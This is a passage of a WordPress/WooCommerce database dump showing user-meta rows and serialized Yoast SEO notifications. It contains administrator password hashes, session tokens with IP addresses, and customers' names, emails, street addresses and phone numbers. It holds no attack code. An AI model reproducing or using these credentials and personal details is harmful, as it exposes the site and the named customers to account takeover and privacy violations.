";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:19:\"manage_postman_smtp\";b:1;s:19:\"manage_postman_logs\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:1:{s:13:\"dismiss_value\";s:6:\"15.6.2\";}s:13:\"dismissal_key\";s:20:\"wpseo-plugin-updated\";s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:1;a:2:{s:7:\"message\";O:61:\"Yoast\\WP\\SEO\\Presenters\\Admin\\Indexing_Notification_Presenter\":3:{s:18:\"\0*\0total_unindexed\";i:682;s:9:\"\0*\0reason\";s:23:\"home_url_option_changed\";s:20:\"\0*\0short_link_helper\";O:38:\"Yoast\\WP\\SEO\\Helpers\\Short_Link_Helper\":2:{s:17:\"\0*\0options_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Options_Helper\":0:{}s:17:\"\0*\0product_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Product_Helper\":0:{}}}s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:13:\"wpseo-reindex\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:12:\"magnaromagna\";s:9:\"user_pass\";s:34:\"$P$BkkSGlLHuDLn5NW/AiQhY6T8/vMnx10\";s:13:\"user_nicename\";s:12:\"magnaromagna\";s:10:\"user_email\";s:25:\"webmaster@baldisserri.com\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2015-07-29 12:22:27\";s:19:\"user_activation_key\";s:45:\"1544810446:$P$BfTTJ5L7pImNFROOpw/uDyANfItmMT.\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:12:\"magnaromagna\";}s:2:\"ID\";i:1;s:4:\"caps\";a:13:{s:13:\"administrator\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:164:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:19:\"manage_postman_smtp\";b:1;s:19:\"manage_postman_logs\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:2;a:2:{s:7:\"message\";s:453:\"Yoast SEO e WooCommerce possono lavorare insieme molto meglio con l\'aggiunta di un plugin helper. Installa Yoast WooCommerce SEO per rendere la tua vita migliore. <a href=\"https://yoa.st/1o0?php_version=7.3&platform=wordpress&platform_version=5.6&software=free&software_version=15.7&days_active=30plus&user_language=it_IT\" aria-label=\"Ulteriori informazioni su Yoast WooCommerce SEO\" target=\"_blank\" rel=\"noopener noreferrer\">Ulteriori informazioni</a>.\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:44:\"wpseo-suggested-plugin-yoast-woocommerce-seo\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:12:\"magnaromagna\";s:9:\"user_pass\";s:34:\"$P$BkkSGlLHuDLn5NW/AiQhY6T8/vMnx10\";s:13:\"user_nicename\";s:12:\"magnaromagna\";s:10:\"user_email\";s:25:\"webmaster@baldisserri.com\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2015-07-29 12:22:27\";s:19:\"user_activation_key\";s:45:\"1544810446:$P$BfTTJ5L7pImNFROOpw/uDyANfItmMT.\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:12:\"magnaromagna\";}s:2:\"ID\";i:1;s:4:\"caps\";a:13:{s:13:\"administrator\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:164:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:19:\"manage_postman_smtp\";b:1;s:19:\"manage_postman_logs\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:15:\"install_plugins\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(1618,59,'nickname','mattia.biografi'),(1619,59,'first_name','Mattia'),(1620,59,'last_name','Biografi'),(1621,59,'description',''),(1622,59,'rich_editing','true'),(1623,59,'syntax_highlighting','true'),(1624,59,'comment_shortcuts','false'),(1625,59,'admin_color','fresh'),(1626,59,'use_ssl','0'),(1627,59,'show_admin_bar_front','true'),(1628,59,'locale',''),(1629,59,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1630,59,'wp_user_level','0'),(1631,59,'dismissed_wp_pointers',''),(1632,59,'_yoast_wpseo_profile_updated','1580931965'),(1633,59,'session_tokens','a:1:{s:64:\"acb69acc806d7cb0292f636dc640bd48d79e9dda2ca1676ca983eb88aaf8cf03\";a:4:{s:10:\"expiration\";i:1582141566;s:2:\"ip\";s:13:\"93.40.213.172\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15\";s:5:\"login\";i:1580931966;}}'),(1634,59,'last_update','1580932007'),(1635,59,'billing_first_name','Mattia'),(1636,59,'billing_last_name','Biografi'),(1637,59,'billing_address_1','via sant\'agata feltria 12'),(1638,59,'billing_city','Rimini'),(1639,59,'billing_email','mattiabio@hotmail.it'),(1640,59,'billing_phone','3398654137'),(1641,59,'shipping_method',''),(1642,59,'wc_last_active','1580860800'),(1643,59,'paying_customer','1'),(1645,43,'paying_customer','1'),(1647,1,'dismissed_wc_admin_notice','1'),(1648,1,'sbi_ignore_new_user_sale_notice','always'),(1649,2,'syntax_highlighting','true'),(1650,2,'instagram',''),(1651,2,'linkedin',''),(1652,2,'myspace',''),(1653,2,'pinterest',''),(1654,2,'soundcloud',''),(1655,2,'tumblr',''),(1656,2,'youtube',''),(1657,2,'wikipedia',''),(1658,60,'nickname','tommaso.stefanini'),(1659,60,'first_name','Tommaso'),(1660,60,'last_name','Stefanini'),(1661,60,'description',''),(1662,60,'rich_editing','true'),(1663,60,'syntax_highlighting','true'),(1664,60,'comment_shortcuts','false'),(1665,60,'admin_color','fresh'),(1666,60,'use_ssl','0'),(1667,60,'show_admin_bar_front','true'),(1668,60,'locale',''),(1669,60,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1670,60,'wp_user_level','0'),(1671,60,'dismissed_wp_pointers',''),(1672,60,'_yoast_wpseo_profile_updated','1581245127'),(1673,60,'session_tokens','a:1:{s:64:\"03f4098d8efd28526c2123032fc098d8cefdc6a9a099fa24c1fc54aaeadb5f77\";a:4:{s:10:\"expiration\";i:1582454729;s:2:\"ip\";s:13:\"2.224.174.131\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15\";s:5:\"login\";i:1581245129;}}'),(1674,60,'last_update','1581245194'),(1675,60,'billing_first_name','Tommaso'),(1676,60,'billing_last_name','Stefanini'),(1677,60,'billing_email','tommasostefanini@libero.it'),(1678,60,'billing_phone','3338462773'),(1679,60,'shipping_method',''),(1680,60,'wc_last_active','1582070400'),(1681,60,'paying_customer','1'),(1684,2,'qlwcdc-user-rating','1'),(1685,61,'nickname','mauro.iacolin'),(1686,61,'first_name','Mauro'),(1687,61,'last_name','Iacolin'),(1688,61,'description',''),(1689,61,'rich_editing','true'),(1690,61,'syntax_highlighting','true'),(1691,61,'comment_shortcuts','false'),(1692,61,'admin_color','fresh'),(1693,61,'use_ssl','0'),(1694,61,'show_admin_bar_front','true'),(1695,61,'locale',''),(1696,61,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1697,61,'wp_user_level','0'),(1698,61,'dismissed_wp_pointers',''),(1699,61,'_yoast_wpseo_profile_updated','1581429123'),(1700,61,'session_tokens','a:1:{s:64:\"7586bc46562d7f83e1a7c5924421e30ecee3a88725f8ff23b07377d8d0e8b1b7\";a:4:{s:10:\"expiration\";i:1582638724;s:2:\"ip\";s:14:\"151.30.175.104\";s:2:\"ua\";s:150:\"Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G925F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.2 Chrome/71.0.3578.99 Mobile Safari/537.36\";s:5:\"login\";i:1581429124;}}'),(1701,61,'last_update','1581429196'),(1702,61,'billing_first_name','Mauro'),(1703,61,'billing_last_name','Iacolin'),(1704,61,'billing_address_1','Via paisiello'),(1705,61,'billing_city','Riccione'),(1706,61,'billing_email','Mauro.iacolin@gmail.com'),(1707,61,'billing_phone','3355829488'),(1708,61,'shipping_method',''),(1709,61,'wc_last_active','1582329600'),(1710,61,'paying_customer','1'),(1719,2,'_order_count','0'),(1721,62,'nickname','mailjet'),(1722,62,'first_name',''),(1723,62,'last_name',''),(1724,62,'description',''),(1725,62,'rich_editing','true'),(1726,62,'syntax_highlighting','true'),(1727,62,'comment_shortcuts','false'),(1728,62,'admin_color','fresh'),(1729,62,'use_ssl','0'),(1730,62,'show_admin_bar_front','true'),(1731,62,'locale',''),(1732,62,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(1733,62,'wp_user_level','10'),(1734,62,'dismissed_wp_pointers',''),(1735,62,'_yoast_wpseo_profile_updated','1611163234'),(1736,63,'nickname','kvchosting'),(1737,63,'first_name',''),(1738,63,'last_name',''),(1739,63,'description',''),(1740,63,'rich_editing','true'),(1741,63,'syntax_highlighting','true'),(1742,63,'comment_shortcuts','false'),(1743,63,'admin_color','fresh'),(1744,63,'use_ssl','0'),(1745,63,'show_admin_bar_front','true'),(1746,63,'locale',''),(1747,63,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(1748,63,'wp_user_level','10'),(1749,63,'_yoast_wpseo_profile_updated','1611163234'),(1750,63,'dismissed_wp_pointers',''),(1752,1,'mailjet_subscribe_ok','1'),(1754,63,'wc_last_active','1603670400'),(1756,63,'mailjet_subscribe_ok',''),(1757,63,'_woocommerce_tracks_anon_id','woo:mm1JNxzaxfTEMSqdr/HDD/IH'),(1758,63,'wp_yoast_notifications','a:3:{i:0;a:2:{s:7:\"message\";s:420:\"<strong>New in Yoast SEO 15.1: </strong>Easily find related keyphrases and their actual Google search volume with the SEMRush integration; Farsi keyphrase recognition. <a href=\"https://yoa.st/yoast15-1?php_version=7.3&#038;platform=wordpress&#038;platform_version=5.5.1&#038;software=free&#038;software_version=15.1.1&#038;days_active=30plus&#038;user_language=en_US\" target=\"_blank\">Read all about version 15.1 here</a>\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"updated\";s:2:\"id\";s:20:\"wpseo-plugin-updated\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:2:\"63\";s:10:\"user_login\";s:10:\"kvchosting\";s:9:\"user_pass\";s:34:\"$P$BiOEU/G8yXeThP08NUXjZBHi/9iYQO1\";s:13:\"user_nicename\";s:10:\"kvchosting\";s:10:\"user_email\";s:31:\"kvchosting@ristorantesolymar.it\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2020-06-08 16:39:13\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:10:\"kvchosting\";}s:2:\"ID\";i:63;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:162:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_